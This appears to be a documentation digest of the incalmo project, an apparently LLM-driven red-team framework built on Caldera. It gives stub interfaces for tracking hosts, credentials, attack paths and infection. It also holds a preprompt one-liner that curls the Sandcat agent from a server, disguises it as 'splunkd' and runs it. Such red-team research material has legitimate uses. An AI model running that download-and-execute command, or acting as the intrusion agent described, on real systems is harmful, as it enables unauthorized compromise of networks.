status. ```Python class Host: # Properties: # ip_address: str # hostname: str # users: dict[str, str] # open_ports: dict[int, str] # ssh_config: list[SSHCredential] # critical_data_files: list[str] # agents: list[Agent] # infected: bool def get_port_for_service(service: str) -> int | None: """Finds the port number for a given service.""" pass def has_service(service: str) -> bool: """Checks if the host has a specific service.""" pass def add_agent(agent: Agent): """Adds an agent to the host and marks it as infected.""" pass def get_agent() -> Agent | None: """Returns a random agent from the host, if any.""" pass ``` -------------------------------- ### Host Class Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_privilege_escalation/codebase.txt Represents an individual host, tracking its network details, services, credentials, agents, and infection status. ```Python class Host: # Properties: # ip_address: str # hostname: str # users: dict[str, str] # open_ports: dict[int, str] # ssh_config: list[SSHCredential] # critical_data_files: list[str] # agents: list[Agent] # infected: bool def get_port_for_service(service: str) -> int | None: """Finds the port number for a given service.""" pass def has_service(service: str) -> bool: """Checks if the host has a specific service.""" pass def add_agent(agent: Agent): """Adds an agent to the host and marks it as infected.""" pass def get_agent() -> Agent | None: """Returns a random agent from the host, if any.""" pass ``` -------------------------------- ### Download and Execute Caldera Agent (Shell) Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/actions/HighLevel/llm_agents/lateral_movement/preprompt.txt This shell command downloads the Sandcat agent from a Caldera server, makes it executable, and runs it in the background. It requires the server address and specifies the platform as Linux. The command uses curl to fetch the agent, saves it as 'splunkd', sets execute permissions, and then runs it. ```shell cd ~; curl -s -X POST -H \'file:sandcat.go\' -H \'platform:linux\' $server/file/download > splunkd; chmod +x splunkd; ./splunkd -server $server -group red & ``` -------------------------------- ### AttackGraphService Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_scan/codebase.txt Handles the generation and management of attack paths within the simulated environment. It provides functionality to record executed paths, check for prior execution, and generate potential attack routes between hosts. ```python class AttackGraphService: """Handles the generation and management of attack paths.""" def executed_attack_path(self, attack_path: AttackPath): """Records an executed attack path.""" pass def already_executed_attack_path(self, attack_path: AttackPath) -> bool: """Checks if an attack path has been executed before.""" pass def get_possible_targets_from_host(self, attacking_host: Host, prioritize_internal_hosts: bool, filter_paths: bool) -> list[AttackPath]: """Generates possible attack paths from a given host.""" pass def get_possible_attack_paths(self, attack_host: Host, target_host: Host, filter_paths: bool) -> list[AttackPath]: """Generates possible attack paths between two specific hosts.""" pass def get_attack_paths_to_target(self, target_host: Host, prioritize_internal_hosts: bool, filter_paths: bool) -> list[AttackPath]: """Generates attack paths to a specific target host.""" pass def find_hosts_with_credentials_to_host(self, target_host: Host) -> list[Host]: """Finds hosts that have credentials to access a target host.""" pass ``` -------------------------------- ### EnvironmentStateService Methods Source: https://github.com/bsinger98/incalmo/blob/main/incalmo/core/strategies/llm/interfaces/preprompts/agent_lateral_move/codebase.txt Manages the overall state of the simulated environment by processing various events and updating host information, credentials, and infection status. ```APIDOC EnvironmentStateService: __init__() Manages the overall state of the simulated environment. parse_events(events: list) Processes various events to update the system state. handle_HostsDiscovered(event: HostsDiscovered) Updates the network with newly discovered hosts. handle_ServicesDiscoveredOnHost(event: ServicesDiscoveredOnHost) Updates host information with discovered services. handle_CrendentialFound(event) Processes newly found credentials. handle_InfectedNewHost(event: InfectedNewHost) Updates the system state when a new host is infected. handle_CriticalDataFound(event: CriticalDataFound) Records critical data found on hosts. update_host_agents(trusted_agents: list[Agent]) Updates the agents associated with each host. add_infected_host(new_agent: Agent) Adds a newly infected host to the network model. log_infected_host_to_caldera(event: InfectedNewHost) Logs infected host information to the Caldera framework. ```